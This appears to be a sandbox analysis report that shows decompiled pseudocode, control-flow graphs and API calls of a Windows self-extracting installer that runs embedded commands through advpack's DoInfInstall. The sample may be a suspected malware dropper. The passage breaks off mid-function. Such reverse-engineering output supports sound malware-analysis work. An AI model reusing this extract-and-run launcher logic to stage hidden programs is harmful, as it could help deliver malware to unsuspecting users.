                                                          control_flow_graph 36 10c3ba2-10c3bd9 37 10c3bfd-10c3bff 36->37 38 10c3bdb-10c3bee call 10c468f 36->38 40 10c3c03-10c3c28 memset 37->40 44 10c3bf4-10c3bf7 38->44 45 10c3d13-10c3d30 call 10c44b9 38->45 42 10c3c2e-10c3c40 call 10c468f 40->42 43 10c3d35-10c3d48 call 10c1781 40->43 42->45 54 10c3c46-10c3c49 42->54 49 10c3d4d-10c3d52 43->49 44->37 44->45 55 10c3f4d 45->55 52 10c3d9e-10c3db6 call 10c1ae8 49->52 53 10c3d54-10c3d6c call 10c468f 49->53 52->55 64 10c3dbc-10c3dc2 52->64 53->45 66 10c3d6e-10c3d75 53->66 54->45 57 10c3c4f-10c3c56 54->57 59 10c3f4f-10c3f63 call 10c6ce0 55->59 61 10c3c58-10c3c5e 57->61 62 10c3c60-10c3c65 57->62 67 10c3c6e-10c3c73 61->67 68 10c3c75-10c3c7c 62->68 69 10c3c67-10c3c6d 62->69 70 10c3dc4-10c3dce 64->70 71 10c3de6-10c3de8 64->71 75 10c3fda-10c3fe1 66->75 76 10c3d7b-10c3d98 CompareStringA 66->76 72 10c3c87-10c3c89 67->72 68->72 73 10c3c7e-10c3c82 68->73 69->67 70->71 77 10c3dd0-10c3dd7 70->77 79 10c3dee-10c3df5 71->79 80 10c3f0b-10c3f15 call 10c3fef 71->80 72->49 78 10c3c8f-10c3c98 72->78 73->72 81 10c3fe8-10c3fea 75->81 82 10c3fe3 call 10c2267 75->82 76->52 76->75 77->71 84 10c3dd9-10c3ddb 77->84 85 10c3c9a-10c3c9c 78->85 86 10c3cf1-10c3cf3 78->86 87 10c3fab-10c3fd2 call 10c44b9 LocalFree 79->87 88 10c3dfb-10c3dfd 79->88 90 10c3f1a-10c3f1c 80->90 81->59 82->81 84->79 91 10c3ddd-10c3de1 call 10c202a 84->91 93 10c3c9e-10c3ca3 85->93 94 10c3ca5-10c3ca7 85->94 86->52 96 10c3cf9-10c3d11 call 10c468f 86->96 87->55 88->80 95 10c3e03-10c3e0a 88->95 98 10c3f1e-10c3f2d LocalFree 90->98 99 10c3f46-10c3f47 LocalFree 90->99 91->71 102 10c3cb2-10c3cc5 call 10c468f 93->102 94->55 103 10c3cad 94->103 95->80 104 10c3e10-10c3e19 call 10c6495 95->104 96->45 96->49 106 10c3fd7-10c3fd9 98->106 107 10c3f33-10c3f3b 98->107 99->55 102->45 112 10c3cc7-10c3ce8 CompareStringA 102->112 103->102 113 10c3e1f-10c3e36 GetProcAddress 104->113 114 10c3f92-10c3fa9 call 10c44b9 104->114 106->75 107->40 112->86 116 10c3cea-10c3ced 112->116 117 10c3e3c-10c3e80 113->117 118 10c3f64-10c3f76 call 10c44b9 FreeLibrary 113->118 125 10c3f7c-10c3f90 LocalFree call 10c6285 114->125 116->86 121 10c3e8b-10c3e94 117->121 122 10c3e82-10c3e87 117->122 118->125 123 10c3e9f-10c3ea2 121->123 124 10c3e96-10c3e9b 121->124 122->121 127 10c3ead-10c3eb6 123->127 128 10c3ea4-10c3ea9 123->128 124->123 125->55 131 10c3eb8-10c3ebd 127->131 132 10c3ec1-10c3ec3 127->132 128->127 131->132 133 10c3ece-10c3eec 132->133 134 10c3ec5-10c3eca 132->134 137 10c3eee-10c3ef3 133->137 138 10c3ef5-10c3efd 133->138 134->133 137->138 139 10c3eff-10c3f09 FreeLibrary 138->139 140 10c3f40 FreeLibrary 138->140 139->98 140->99
                                                          C-Code - Quality: 82%
                                                          			E010C3BA2() {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				char _v276;
                                                          				char _v280;
                                                          				short _v300;
                                                          				intOrPtr _v304;
                                                          				void _v348;
                                                          				char _v352;
                                                          				intOrPtr _v356;
                                                          				signed int _v360;
                                                          				short _v364;
                                                          				char* _v368;
                                                          				intOrPtr _v372;
                                                          				void* _v376;
                                                          				intOrPtr _v380;
                                                          				char _v384;
                                                          				signed int _v388;
                                                          				intOrPtr _v392;
                                                          				signed int _v396;
                                                          				signed int _v400;
                                                          				signed int _v404;
                                                          				void* _v408;
                                                          				void* _v424;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t69;
                                                          				signed int _t76;
                                                          				void* _t77;
                                                          				signed int _t79;
                                                          				short _t96;
                                                          				signed int _t97;
                                                          				intOrPtr _t98;
                                                          				signed int _t101;
                                                          				signed int _t104;
                                                          				signed int _t108;
                                                          				int _t112;
                                                          				void* _t115;
                                                          				signed char _t118;
                                                          				void* _t125;
                                                          				signed int _t127;
                                                          				void* _t128;
                                                          				struct HINSTANCE__* _t129;
                                                          				void* _t130;
                                                          				short _t137;
                                                          				char* _t140;
                                                          				signed char _t144;
                                                          				signed char _t145;
                                                          				signed int _t149;
                                                          				void* _t150;
                                                          				void* _t151;
                                                          				signed int _t153;
                                                          				void* _t155;
                                                          				void* _t156;
                                                          				signed int _t157;
                                                          				signed int _t162;
                                                          				signed int _t164;
                                                          				void* _t165;
                                                          
                                                          				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                          				_t69 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t69 ^ _t164;
                                                          				_t153 = 0;
                                                          				 *0x10c9124 =  *0x10c9124 & 0;
                                                          				_t149 = 0;
                                                          				_v388 = 0;
                                                          				_v384 = 0;
                                                          				_t165 =  *0x10c8a28 - _t153; // 0x0
                                                          				if(_t165 != 0) {
                                                          					L3:
                                                          					_t127 = 0;
                                                          					_v392 = 0;
                                                          					while(1) {
                                                          						_v400 = _v400 & 0x00000000;
                                                          						memset( &_v348, 0, 0x44);
                                                          						_t164 = _t164 + 0xc;
                                                          						_v348 = 0x44;
                                                          						if( *0x10c8c42 != 0) {
                                                          							goto L26;
                                                          						}
                                                          						_t146 =  &_v396;
                                                          						_t115 = E010C468F("SHOWWINDOW",  &_v396, 4);
                                                          						if(_t115 == 0 || _t115 > 4) {
                                                          							L25:
                                                          							_t146 = 0x4b1;
                                                          							E010C44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                          							 *0x10c9124 = 0x80070714;
                                                          							goto L62;
                                                          						} else {
                                                          							if(_v396 != 1) {
                                                          								__eflags = _v396 - 2;
                                                          								if(_v396 != 2) {
                                                          									_t137 = 3;
                                                          									__eflags = _v396 - _t137;
                                                          									if(_v396 == _t137) {
                                                          										_v304 = 1;
                                                          										_v300 = _t137;
                                                          									}
                                                          									goto L14;
                                                          								}
                                                          								_push(6);
                                                          								_v304 = 1;
                                                          								_pop(0);
                                                          								goto L11;
                                                          							} else {
                                                          								_v304 = 1;
                                                          								L11:
                                                          								_v300 = 0;
                                                          								L14:
                                                          								if(_t127 != 0) {
                                                          									L27:
                                                          									_t155 = 1;
                                                          									__eflags = _t127 - 1;
                                                          									if(_t127 != 1) {
                                                          										L31:
                                                          										_t132 =  &_v280;
                                                          										_t76 = E010C1AE8( &_v280,  &_v408,  &_v404); // executed
                                                          										__eflags = _t76;
                                                          										if(_t76 == 0) {
                                                          											L62:
                                                          											_t77 = 0;
                                                          											L63:
                                                          											_pop(_t150);
                                                          											_pop(_t156);
                                                          											_pop(_t128);
                                                          											return E010C6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                          										}
                                                          										_t157 = _v404;
                                                          										__eflags = _t149;
                                                          										if(_t149 != 0) {
                                                          											L37:
                                                          											__eflags = _t157;
                                                          											if(_t157 == 0) {
                                                          												L57:
                                                          												_t151 = _v408;
                                                          												_t146 =  &_v352;
                                                          												_t130 = _t151; // executed
                                                          												_t79 = E010C3FEF(_t130,  &_v352); // executed
                                                          												__eflags = _t79;
                                                          												if(_t79 == 0) {
                                                          													L61:
                                                          													LocalFree(_t151);
                                                          													goto L62;
                                                          												}
                                                          												L58:
                                                          												LocalFree(_t151);
                                                          												_t127 = _t127 + 1;
                                                          												_v396 = _t127;
                                                          												__eflags = _t127 - 2;
                                                          												if(_t127 >= 2) {
                                                          													_t155 = 1;
                                                          													__eflags = 1;
                                                          													L69:
                                                          													__eflags =  *0x10c8580;
                                                          													if( *0x10c8580 != 0) {
                                                          														E010C2267();
                                                          													}
                                                          													_t77 = _t155;
                                                          													goto L63;
                                                          												}
                                                          												_t153 = _v392;
                                                          												_t149 = _v388;
                                                          												continue;
                                                          											}
                                                          											L38:
                                                          											__eflags =  *0x10c8180;
                                                          											if( *0x10c8180 == 0) {
                                                          												_t146 = 0x4c7;
                                                          												E010C44B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                          												LocalFree(_v424);
                                                          												 *0x10c9124 = 0x8007042b;
                                                          												goto L62;
                                                          											}
                                                          											__eflags = _t157;
                                                          											if(_t157 == 0) {
                                                          												goto L57;
                                                          											}
                                                          											__eflags =  *0x10c9a34 & 0x00000004;
                                                          											if(__eflags == 0) {
                                                          												goto L57;
                                                          											}
                                                          											_t129 = E010C6495(_t127, _t132, _t157, __eflags);
                                                          											__eflags = _t129;
                                                          											if(_t129 == 0) {
                                                          												_t146 = 0x4c8;
                                                          												E010C44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                          												L65:
                                                          												LocalFree(_v408);
                                                          												 *0x10c9124 = E010C6285();
                                                          												goto L62;
                                                          											}
                                                          											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                          											_v404 = _t146;
                                                          											__eflags = _t146;
                                                          											if(_t146 == 0) {
                                                          												_t146 = 0x4c9;
                                                          												__eflags = 0;
                                                          												E010C44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                          												FreeLibrary(_t129);
                                                          												goto L65;
                                                          											}
                                                          											__eflags =  *0x10c8a30;
                                                          											_t151 = _v408;
                                                          											_v384 = 0;
                                                          											_v368 =  &_v280;
                                                          											_t96 =  *0x10c9a40; // 0x3
                                                          											_v364 = _t96;
                                                          											_t97 =  *0x10c8a38 & 0x0000ffff;
                                                          											_v380 = 0x10c9154;
                                                          											_v376 = _t151;
                                                          											_v372 = 0x10c91e4;
                                                          											_v360 = _t97;
                                                          											if( *0x10c8a30 != 0) {
                                                          												_t97 = _t97 | 0x00010000;
                                                          												__eflags = _t97;
                                                          												_v360 = _t97;
                                                          											}
                                                          											_t144 =  *0x10c9a34; // 0x1
                                                          											__eflags = _t144 & 0x00000008;
                                                          											if((_t144 & 0x00000008) != 0) {
                                                          												_t97 = _t97 | 0x00020000;
                                                          												__eflags = _t97;
                                                          												_v360 = _t97;
                                                          											}
                                                          											__eflags = _t144 & 0x00000010;
                                                          											if((_t144 & 0x00000010) != 0) {
                                                          												_t97 = _t97 | 0x00040000;
                                                          												__eflags = _t97;
                                                          												_v360 = _t97;
                                                          											}
                                                          											_t145 =  *0x10c8d48; // 0x0
                                                          											__eflags = _t145 & 0x00000040;
                                                          											if((_t145 & 0x00000040) != 0) {
                                                          												_t97 = _t97 | 0x00080000;
                                                          												__eflags = _t97;
                                                          												_v360 = _t97;
                                                          											}
                                                          											__eflags = _t145;
                                                          											if(_t145 < 0) {
                                                          												_t104 = _t97 | 0x00100000;
                                                          												__eflags = _t104;
                                                          												_v360 = _t104;
                                                          											}
                                                          											_t98 =  *0x10c9a38; // 0x0
                                                          											_v356 = _t98;
                                                          											_t130 = _t146;
                                                          											 *0x10ca288( &_v384);
                                                          											_t101 = _v404();
                                                          											__eflags = _t164 - _t164;
                                                          											if(_t164 != _t164) {
                                                          												_t130 = 4;
                                                          												asm("int 0x29");
                                                          											}
                                                          											 *0x10c9124 = _t101;
                                                          											_push(_t129);
                                                          											__eflags = _t101;
                                                          											if(_t101 < 0) {
                                                          												FreeLibrary();
                                                          												goto L61;
                                                          											} else {
                                                          												FreeLibrary();
                                                          												_t127 = _v400;
                                                          												goto L58;
                                                          											}
                                                          										}
                                                          										__eflags =  *0x10c9a40 - 1; // 0x3
                                                          										if(__eflags == 0) {
                                                          											goto L37;
                                                          										}
                                                          										__eflags =  *0x10c8a20;
                                                          										if( *0x10c8a20 == 0) {
                                                          											goto L37;
                                                          										}
                                                          										__eflags = _t157;
                                                          										if(_t157 != 0) {
                                                          											goto L38;
                                                          										}
                                                          										_v388 = 1;
                                                          										E010C202A(_t146); // executed
                                                          										goto L37;
                                                          									}
                                                          									_t146 =  &_v280;
                                                          									_t108 = E010C468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                          									__eflags = _t108;
                                                          									if(_t108 == 0) {
                                                          										goto L25;
                                                          									}
                                                          									__eflags =  *0x10c8c42;
                                                          									if( *0x10c8c42 != 0) {
                                                          										goto L69;
                                                          									}
                                                          									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                          									__eflags = _t112 == 0;
                                                          									if(_t112 == 0) {
                                                          										goto L69;
                                                          									}
                                                          									goto L31;
                                                          								}
                                                          								_t118 =  *0x10c8a38; // 0x0
                                                          								if(_t118 == 0) {
                                                          									L23:
                                                          									if(_t153 != 0) {
                                                          										goto L31;
                                                          									}
                                                          									_t146 =  &_v276;
                                                          									if(E010C468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                          										goto L27;
                                                          									}
                                                          									goto L25;
                                                          								}
                                                          								if((_t118 & 0x00000001) == 0) {
                                                          									__eflags = _t118 & 0x00000002;
                                                          									if((_t118 & 0x00000002) == 0) {
                                                          										goto L62;
                                                          									}
                                                          									_t140 = "USRQCMD";
                                                          									L20:
                                                          									_t146 =  &_v276;
                                                          									if(E010C468F(_t140,  &_v276, 0x104) == 0) {
                                                          										goto L25;
                                                          									}
                                                          									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                          										_t153 = 1;
                                                          										_v388 = 1;
                                                          									}
                                                          									goto L23;
                                                          								}
                                                          								_t140 = "ADMQCMD";
                                                          								goto L20;
                                                          							}
                                                          						}
                                                          						L26:
                                                          						_push(_t130);
                                                          						_t146 = 0x104;
                                                          						E010C1781( &_v276, 0x104, _t130, 0x10c8c42);
                                                          						goto L27;
                                                          					}
                                                          				}
                                                          				_t130 = "REBOOT";
                                                          				_t125 = E010C468F(_t130, 0x10c9a2c, 4);
                                                          				if(_t125 == 0 || _t125 > 4) {
                                                          					goto L25;
                                                          				} else {
                                                          					goto L3;
                                                          				}
                                                          			}





























































                                                          0x010c3baa
                                                          0x010c3bb0
                                                          0x010c3bb7
                                                          0x010c3bc0
                                                          0x010c3bc2
                                                          0x010c3bc9
                                                          0x010c3bcb
                                                          0x010c3bcf
                                                          0x010c3bd3
                                                          0x010c3bd9
                                                          0x010c3bfd
                                                          0x010c3bfd
                                                          0x010c3bff
                                                          0x010c3c03
                                                          0x010c3c03
                                                          0x010c3c11
                                                          0x010c3c16
                                                          0x010c3c19
                                                          0x010c3c28
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3c30
                                                          0x010c3c39
                                                          0x010c3c40
                                                          0x010c3d13
                                                          0x010c3d15
                                                          0x010c3d21
                                                          0x010c3d26
                                                          0x00000000
                                                          0x010c3c4f
                                                          0x010c3c56
                                                          0x010c3c60
                                                          0x010c3c65
                                                          0x010c3c77
                                                          0x010c3c78
                                                          0x010c3c7c
                                                          0x010c3c7e
                                                          0x010c3c82
                                                          0x010c3c82
                                                          0x00000000
                                                          0x010c3c7c
                                                          0x010c3c67
                                                          0x010c3c69
                                                          0x010c3c6d
                                                          0x00000000
                                                          0x010c3c58
                                                          0x010c3c58
                                                          0x010c3c6e
                                                          0x010c3c6e
                                                          0x010c3c87
                                                          0x010c3c89
                                                          0x010c3d4d
                                                          0x010c3d4f
                                                          0x010c3d50
                                                          0x010c3d52
                                                          0x010c3d9e
                                                          0x010c3da8
                                                          0x010c3daf
                                                          0x010c3db4
                                                          0x010c3db6
                                                          0x010c3f4d
                                                          0x010c3f4d
                                                          0x010c3f4f
                                                          0x010c3f56
                                                          0x010c3f57
                                                          0x010c3f58
                                                          0x010c3f63
                                                          0x010c3f63
                                                          0x010c3dbc
                                                          0x010c3dc0
                                                          0x010c3dc2
                                                          0x010c3de6
                                                          0x010c3de6
                                                          0x010c3de8
                                                          0x010c3f0b
                                                          0x010c3f0b
                                                          0x010c3f0f
                                                          0x010c3f13
                                                          0x010c3f15
                                                          0x010c3f1a
                                                          0x010c3f1c
                                                          0x010c3f46
                                                          0x010c3f47
                                                          0x00000000
                                                          0x010c3f47
                                                          0x010c3f1e
                                                          0x010c3f1f
                                                          0x010c3f25
                                                          0x010c3f26
                                                          0x010c3f2a
                                                          0x010c3f2d
                                                          0x010c3fd9
                                                          0x010c3fd9
                                                          0x010c3fda
                                                          0x010c3fda
                                                          0x010c3fe1
                                                          0x010c3fe3
                                                          0x010c3fe3
                                                          0x010c3fe8
                                                          0x00000000
                                                          0x010c3fe8
                                                          0x010c3f33
                                                          0x010c3f37
                                                          0x00000000
                                                          0x010c3f37
                                                          0x010c3dee
                                                          0x010c3dee
                                                          0x010c3df5
                                                          0x010c3fad
                                                          0x010c3fb9
                                                          0x010c3fc2
                                                          0x010c3fc8
                                                          0x00000000
                                                          0x010c3fc8
                                                          0x010c3dfb
                                                          0x010c3dfd
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3e03
                                                          0x010c3e0a
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3e15
                                                          0x010c3e17
                                                          0x010c3e19
                                                          0x010c3f94
                                                          0x010c3fa4
                                                          0x010c3f7c
                                                          0x010c3f80
                                                          0x010c3f8b
                                                          0x00000000
                                                          0x010c3f8b
                                                          0x010c3e2c
                                                          0x010c3e30
                                                          0x010c3e34
                                                          0x010c3e36
                                                          0x010c3f69
                                                          0x010c3f6e
                                                          0x010c3f70
                                                          0x010c3f76
                                                          0x00000000
                                                          0x010c3f76
                                                          0x010c3e3c
                                                          0x010c3e43
                                                          0x010c3e47
                                                          0x010c3e52
                                                          0x010c3e56
                                                          0x010c3e5c
                                                          0x010c3e61
                                                          0x010c3e68
                                                          0x010c3e70
                                                          0x010c3e74
                                                          0x010c3e7c
                                                          0x010c3e80
                                                          0x010c3e82
                                                          0x010c3e82
                                                          0x010c3e87
                                                          0x010c3e87
                                                          0x010c3e8b
                                                          0x010c3e91
                                                          0x010c3e94
                                                          0x010c3e96
                                                          0x010c3e96
                                                          0x010c3e9b
                                                          0x010c3e9b
                                                          0x010c3e9f
                                                          0x010c3ea2
                                                          0x010c3ea4
                                                          0x010c3ea4
                                                          0x010c3ea9
                                                          0x010c3ea9
                                                          0x010c3ead
                                                          0x010c3eb3
                                                          0x010c3eb6
                                                          0x010c3eb8
                                                          0x010c3eb8
                                                          0x010c3ebd
                                                          0x010c3ebd
                                                          0x010c3ec1
                                                          0x010c3ec3
                                                          0x010c3ec5
                                                          0x010c3ec5
                                                          0x010c3eca
                                                          0x010c3eca
                                                          0x010c3ece
                                                          0x010c3ed5
                                                          0x010c3ed9
                                                          0x010c3ee0
                                                          0x010c3ee6
                                                          0x010c3eea
                                                          0x010c3eec
                                                          0x010c3eee
                                                          0x010c3ef3
                                                          0x010c3ef3
                                                          0x010c3ef5
                                                          0x010c3efa
                                                          0x010c3efb
                                                          0x010c3efd
                                                          0x010c3f40
                                                          0x00000000
                                                          0x010c3eff
                                                          0x010c3eff
                                                          0x010c3f05
                                                          0x00000000
                                                          0x010c3f05
                                                          0x010c3efd
                                                          0x010c3dc7
                                                          0x010c3dce
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3dd0
                                                          0x010c3dd7
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3dd9
                                                          0x010c3ddb
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3ddd
                                                          0x010c3de1
                                                          0x00000000
                                                          0x010c3de1
                                                          0x010c3d59
                                                          0x010c3d65
                                                          0x010c3d6a
                                                          0x010c3d6c
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3d6e
                                                          0x010c3d75
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3d8f
                                                          0x010c3d96
                                                          0x010c3d98
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3d98
                                                          0x010c3c8f
                                                          0x010c3c98
                                                          0x010c3cf1
                                                          0x010c3cf3
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3cfe
                                                          0x010c3d11
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3d11
                                                          0x010c3c9c
                                                          0x010c3ca5
                                                          0x010c3ca7
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3cad
                                                          0x010c3cb2
                                                          0x010c3cb7
                                                          0x010c3cc5
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3ce8
                                                          0x010c3cec
                                                          0x010c3ced
                                                          0x010c3ced
                                                          0x00000000
                                                          0x010c3ce8
                                                          0x010c3c9e
                                                          0x00000000
                                                          0x010c3c9e
                                                          0x010c3c56
                                                          0x010c3d35
                                                          0x010c3d35
                                                          0x010c3d3c
                                                          0x010c3d48
                                                          0x00000000
                                                          0x010c3d48
                                                          0x010c3c03
                                                          0x010c3be2
                                                          0x010c3be7
                                                          0x010c3bee
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • memset.MSVCRT ref: 010C3C11
                                                          • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 010C3CDC
                                                            • Part of subcall function 010C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46A0
                                                            • Part of subcall function 010C468F: SizeofResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46A9
                                                            • Part of subcall function 010C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46C3
                                                            • Part of subcall function 010C468F: LoadResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46CC
                                                            • Part of subcall function 010C468F: LockResource.KERNEL32(00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46D3
                                                            • Part of subcall function 010C468F: memcpy_s.MSVCRT ref: 010C46E5
                                                            • Part of subcall function 010C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46EF
                                                          • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,010C8C42), ref: 010C3D8F
                                                          • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 010C3E26
                                                          • FreeLibrary.KERNEL32(00000000,?,010C8C42), ref: 010C3EFF
                                                          • LocalFree.KERNEL32(?,?,?,?,010C8C42), ref: 010C3F1F
                                                          • FreeLibrary.KERNEL32(00000000,?,010C8C42), ref: 010C3F40
                                                          • LocalFree.KERNEL32(?,?,?,?,010C8C42), ref: 010C3F47
                                                          • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,010C8C42), ref: 010C3F76
                                                          • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,010C8C42), ref: 010C3F80
                                                          • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,010C8C42), ref: 010C3FC2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                          • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$zhiga
                                                          • API String ID: 1032054927-3746868062
                                                          • Opcode ID: 6376574b984f668440fc0ccd2d22b3e6f69a0837c928c9d32c0d791b73c955ab
                                                          • Instruction ID: c6d863a1a8ecd78be10372a1e2e870dff37ff4a2f265458066f049b0875503f7
                                                          • Opcode Fuzzy Hash: 6376574b984f668440fc0ccd2d22b3e6f69a0837c928c9d32c0d791b73c955ab
                                                          • Instruction Fuzzy Hash: FAB1DE706243029FE770AF289845B6F7AE5BB84F40F10892EFAC5DA180E775C801CF96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 141 10c1ae8-10c1b2c call 10c1680 144 10c1b2e-10c1b39 141->144 145 10c1b3b-10c1b40 141->145 146 10c1b46-10c1b61 call 10c1a84 144->146 145->146 149 10c1b9f-10c1bc2 call 10c1781 call 10c658a 146->149 150 10c1b63-10c1b65 146->150 159 10c1bc7-10c1bd3 call 10c66c8 149->159 151 10c1b68-10c1b6d 150->151 151->151 153 10c1b6f-10c1b74 151->153 153->149 155 10c1b76-10c1b7b 153->155 157 10c1b7d-10c1b81 155->157 158 10c1b83-10c1b86 155->158 157->158 161 10c1b8c-10c1b9d call 10c1680 157->161 158->149 162 10c1b88-10c1b8a 158->162 165 10c1bd9-10c1bf1 CompareStringA 159->165 166 10c1d73-10c1d7f call 10c66c8 159->166 161->159 162->149 162->161 165->166 168 10c1bf7-10c1c07 GetFileAttributesA 165->168 175 10c1df8-10c1e09 LocalAlloc 166->175 176 10c1d81-10c1d99 CompareStringA 166->176 170 10c1c0d-10c1c15 168->170 171 10c1d53-10c1d5e 168->171 170->171 174 10c1c1b-10c1c33 call 10c1a84 170->174 173 10c1d64-10c1d6e call 10c44b9 171->173 187 10c1e94-10c1ea4 call 10c6ce0 173->187 189 10c1c35-10c1c38 174->189 190 10c1c50-10c1c61 LocalAlloc 174->190 178 10c1e0b-10c1e1b GetFileAttributesA 175->178 179 10c1dd4-10c1ddf 175->179 176->175 181 10c1d9b-10c1da2 176->181 183 10c1e1d-10c1e1f 178->183 184 10c1e67-10c1e73 call 10c1680 178->184 179->173 186 10c1da5-10c1daa 181->186 183->184 188 10c1e21-10c1e3e call 10c1781 183->188 199 10c1e78-10c1e84 call 10c2aac 184->199 186->186 191 10c1dac-10c1db4 186->191 188->199 210 10c1e40-10c1e43 188->210 195 10c1c3a 189->195 196 10c1c40-10c1c4b call 10c1a84 189->196 190->179 198 10c1c67-10c1c72 190->198 197 10c1db7-10c1dbc 191->197 195->196 196->190 197->197 203 10c1dbe-10c1dd2 LocalAlloc 197->203 204 10c1c79-10c1cc0 GetPrivateProfileIntA GetPrivateProfileStringA 198->204 205 10c1c74 198->205 209 10c1e89-10c1e92 199->209 203->179 211 10c1de1-10c1df3 call 10c171e 203->211 207 10c1cf8-10c1d07 204->207 208 10c1cc2-10c1ccc 204->208 205->204 215 10c1d09-10c1d21 GetShortPathNameA 207->215 216 10c1d23 207->216 212 10c1cce 208->212 213 10c1cd3-10c1cf3 call 10c1680 * 2 208->213 209->187 210->199 214 10c1e45-10c1e65 call 10c16b3 * 2 210->214 211->209 212->213 213->209 214->199 220 10c1d28-10c1d2b 215->220 216->220 224 10c1d2d 220->224 225 10c1d32-10c1d4e call 10c171e 220->225 224->225 225->209
                                                          C-Code - Quality: 82%
                                                          			E010C1AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				char _v527;
                                                          				char _v528;
                                                          				char _v1552;
                                                          				CHAR* _v1556;
                                                          				int* _v1560;
                                                          				CHAR** _v1564;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t48;
                                                          				CHAR* _t53;
                                                          				CHAR* _t54;
                                                          				char* _t57;
                                                          				char* _t58;
                                                          				CHAR* _t60;
                                                          				void* _t62;
                                                          				signed char _t65;
                                                          				intOrPtr _t76;
                                                          				intOrPtr _t77;
                                                          				unsigned int _t85;
                                                          				CHAR* _t90;
                                                          				CHAR* _t92;
                                                          				char _t105;
                                                          				char _t106;
                                                          				CHAR** _t111;
                                                          				CHAR* _t115;
                                                          				intOrPtr* _t125;
                                                          				void* _t126;
                                                          				CHAR* _t132;
                                                          				CHAR* _t135;
                                                          				void* _t138;
                                                          				void* _t139;
                                                          				void* _t145;
                                                          				intOrPtr* _t146;
                                                          				char* _t148;
                                                          				CHAR* _t151;
                                                          				void* _t152;
                                                          				CHAR* _t155;
                                                          				CHAR* _t156;
                                                          				void* _t157;
                                                          				signed int _t158;
                                                          
                                                          				_t48 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t48 ^ _t158;
                                                          				_t108 = __ecx;
                                                          				_v1564 = _a4;
                                                          				_v1560 = _a8;
                                                          				E010C1680( &_v528, 0x104, __ecx);
                                                          				if(_v528 != 0x22) {
                                                          					_t135 = " ";
                                                          					_t53 =  &_v528;
                                                          				} else {
                                                          					_t135 = "\"";
                                                          					_t53 =  &_v527;
                                                          				}
                                                          				_t111 =  &_v1556;
                                                          				_v1556 = _t53;
                                                          				_t54 = E010C1A84(_t111, _t135);
                                                          				_t156 = _v1556;
                                                          				_t151 = _t54;
                                                          				if(_t156 == 0) {
                                                          					L12:
                                                          					_push(_t111);
                                                          					E010C1781( &_v268, 0x104, _t111, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
                                                          					E010C658A( &_v268, 0x104, _t156);
                                                          					goto L13;
                                                          				} else {
